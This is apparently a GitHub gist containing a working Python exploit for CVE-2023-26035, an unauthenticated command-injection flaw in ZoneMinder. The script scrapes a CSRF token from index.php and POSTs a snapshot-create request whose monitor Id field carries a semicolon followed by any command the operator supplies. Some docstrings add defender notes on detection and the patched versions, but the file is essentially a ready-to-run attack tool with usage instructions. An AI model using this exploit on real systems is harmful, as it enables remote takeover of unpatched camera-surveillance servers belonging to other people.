@Splinter0
Created December 10, 2023 20:29
ZoneMinder RCE - CVE-2023-26035
# Author: https://github.com/Splinter0
# ZoneMinder RCE - CVE-2023-26035
# Affects: ZoneMinder versions before 1.36.33 and 1.37.33 (the releases that contain the fix)
# https://nvd.nist.gov/vuln/detail/CVE-2023-26035
import re
import sys
import requests
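def getCsrfToken(target: str) -> str:
    """Fetch ``{target}/index.php`` and return the CSRF token found in it.

    The page is requested with a plain GET: no cookies, session or
    credentials are attached. The first substring of the response body that
    looks like ``key:<40 lowercase hex chars>,<digits>`` is taken as the
    token (the digits are presumably a timestamp; the page does not say).

    Args:
        target: Base URL of the ZoneMinder web root. It is used as-is, so a
            trailing slash produces ``//index.php``.

    Returns:
        The matched token string, later submitted as ``__csrf_magic``.

    Exits the process with status 1 (after printing a message) when the
    response status is not 200 or no token-shaped string is present.
    """
    # Bound the wait so an unresponsive host cannot hang the script forever.
    r = requests.get(f"{target}/index.php", timeout=10)
    if r.status_code != 200:
        print("[-] Could not fetch CSRF token!")
        # sys.exit instead of exit(): the latter is a helper injected by the
        # `site` module and is not guaranteed to exist in every interpreter.
        sys.exit(1)

    # Raw string: "\d" inside a normal literal is an invalid escape sequence
    # and raises a SyntaxWarning on current Python versions.
    m = re.search(r"key:[a-f0-9]{40},\d+", r.text)
    if m is None:
        print("[-] Could not extract CSRF token!")
        sys.exit(1)

    token = m.group(0)
    print(f"[+] Found CSRF token: {token}")
    return token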
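def sendCommand(target: str, cmd: str, csrfToken: str) -> None:
    """POST the snapshot-create form that carries ``cmd`` in the monitor Id.

    The form body holds ``view=snapshot``, ``action=create``, a
    ``monitor_ids[0][Id]`` value made of ``;`` followed by ``cmd``, and the
    token as ``__csrf_magic``. No session cookie or credential is attached.
    NVD attributes CVE-2023-26035 to a missing authorization check on the
    snapshot action, with the supplied Id ending up in a shell call (see the
    advisory linked in the file header).

    Defender notes: the field names above, together with a non-numeric
    ``monitor_ids[0][Id]`` value, are the recognisable part of this request.
    Rejecting or alerting on non-integer values for that field at a reverse
    proxy, and searching logged POST bodies for it, covers hosts that cannot
    be patched at once. The remediation is upgrading to 1.36.33 / 1.37.33
    or later, the boundary given in the file header.

    Args:
        target: Base URL of the ZoneMinder web root, used as-is.
        cmd: Text placed after the ``;`` in the Id field.
        csrfToken: Token string as returned by ``getCsrfToken``.

    Exits the process with status 1 when the response status is not 200.
    """
    form = {
        "view": "snapshot",
        "action": "create",
        "monitor_ids[0][Id]": f";{cmd}",
        "__csrf_magic": csrfToken,
    }
    r = requests.post(f"{target}/index.php", data=form)
    if r.status_code != 200:
        print("[-] Could not run command!")
        # sys.exit instead of exit(): the latter is a helper injected by the
        # `site` module and is not guaranteed to exist in every interpreter.
        sys.exit(1)
    # HTTP 200 only shows that the server answered; the response body is not
    # inspected, so this message does not prove that anything was executed.
    print("[+] Ran command successfully")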
def exploit(target: str, cmd: str):
    """Run both steps against ``target``: fetch a token, then submit ``cmd``.

    The token request happens first; if it fails, ``getCsrfToken`` ends the
    process and the POST is never sent.
    """
    sendCommand(target, cmd, getCsrfToken(target))
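if __name__ == "__main__":
    # Two positional arguments are required: the base URL and the command
    # string. Anything after them is ignored.
    if len(sys.argv) < 3:
        print("Usage: python3 CVE-2023-26035.py <url> <cmd>")
        # sys.exit instead of exit(): the latter is a helper injected by the
        # `site` module and is not guaranteed to exist in every interpreter.
        sys.exit(1)
    target, cmd = sys.argv[1], sys.argv[2]
    exploit(target, cmd)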